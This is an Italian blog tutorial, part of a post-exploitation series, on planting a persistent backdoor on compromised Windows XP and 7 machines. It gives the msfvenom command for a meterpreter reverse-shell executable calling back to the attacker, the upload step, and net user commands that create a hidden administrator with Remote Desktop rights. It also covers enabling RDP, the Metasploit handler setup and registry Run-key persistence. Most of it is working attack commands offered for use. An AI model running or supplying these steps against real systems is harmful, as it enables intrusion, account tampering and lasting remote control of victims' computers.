fbpx

Post Exploitation – BackDoor Persistente

Proseguendo l’argomento “Post Exploitation” passiamo alla BackDoor Persistente! Prima di procedere oltre vi consiglio di rileggere i precedenti articoli:
– PenTest Completo con Metasploit
– Post Exploitation – Raccolta Informazioni
– Post Exploitation – Escalare i Privilegi
Mostreremo due casi diversi, nel primo caso abbiamo accesso al Remote Desktop, nel secondo NO.
Vediamo il primo (Macchina WinXP), iniziamo col crearela BackDoor tramite msfvenom, il comando sarà:
msfvenom -p windows/meterpreter/reverse_tcp -a x86 –platform windows LHOST=[il vostro IP] LPORT=[la porta] -f exe > hack.exe

dove:
-p sta per Payload,
-a sta per Architettura,
-f determina il formato del file (.exe)

Fatto ciò avremmo una BackDoor (hack.exe) pronta all’uso salvata su nostro Desktop. Ora  dobbiamo uplodarla sulla macchina vittima. Quindi dalla sessione meterpreter della macchina Exploitata recatevi in C:/ e date il comando:  upload /root/scrivania/hack.exe

Perfetto la BackDoor è sulla macchina vittima! Adesso aprire la BackDoor tramite Desktop  Remoto. Per abilitare il Desktop Remoto e lanciare la BackDoor come Admin…
….Fermi Tutti!!! Nel caso in questione, NON siamo Admin ed il comando GetSystem non funzionerà!!!…

Quindi dalla sessione di meterpreter (NO RooT) dare il comando shell e digitare in ordine quanto segue:

[C:/] net user hack pass /add  (creare un nuovo utente “semplice“)
[C:/] net localgroup Administrators hack /add  (lo aggiunge al gruppo “Admin“)
[C:/] net localgroup “Remote Desktop Users” hack /add (aggiunge utente al gruppo RDP)

Tornare a Meterpreter ed abilitare il Desktop Remoto:  run getgui -e
Dopodichè aprire un terminale e collegarsi al desktop appena creato : rdesktop “IP Target” -u “Nome Utente

Aprire BackDoor come Admin (l’utente Admin che abbiamo creato prima).

In simultanea collegarsi alla BackDoor con handler. Da Metasploit settare come a seguire:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT (la porta che sta sulla BackDoor)
set LHOST (il vostro IP)
exploit

Si dovrebbe creare una nuova sessione di Meterpreter e procedete con il Privilege Escalation. In fine stabilizzare backdoor modificando il registro del sistema, in questo modo la bdoor si aprirà all’avvio del PC! Mettete in BackGround la sessione precedente, ed aprite la nuova sessione con i privilegi di RooT creata poco fa ed eseguite il comando come in foto:

Ecco fatto, abbiamo la nostra Backdoor Persistente!
Per concludere vediamo il secondo metodo (Macchina Win7 senza usare RDP). Esiste un modulo Metasploit che consente di creare una BackDoor ed aggiungerla al registro di sistema in automatico, cosicchè la bdoor venga eseguita all’avvio del PC. Quando lanciate questo modulo accertatevi di essere Root, o preferibilmente utilizzate l’account originale dell’Admin. Questo perchè la bdoor in questione si installerà o nel registro di un utente specifico, o nel registro di tutti gli utenti.
I 2 Registri (estratti dal Source Code dell’Exploit):
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ (Tutti gli Utenti)
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ (Utente Specifico)

Il presupposto principale per cui una BackDoor possa avviarsi automaticamente è che l’AutoRun sia Attivo! Guarda come Impostare Autorun in Windows 7
Per ora è Tutto, Grazie per la Lettura!

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

Un commento su “Post Exploitation – BackDoor Persistente”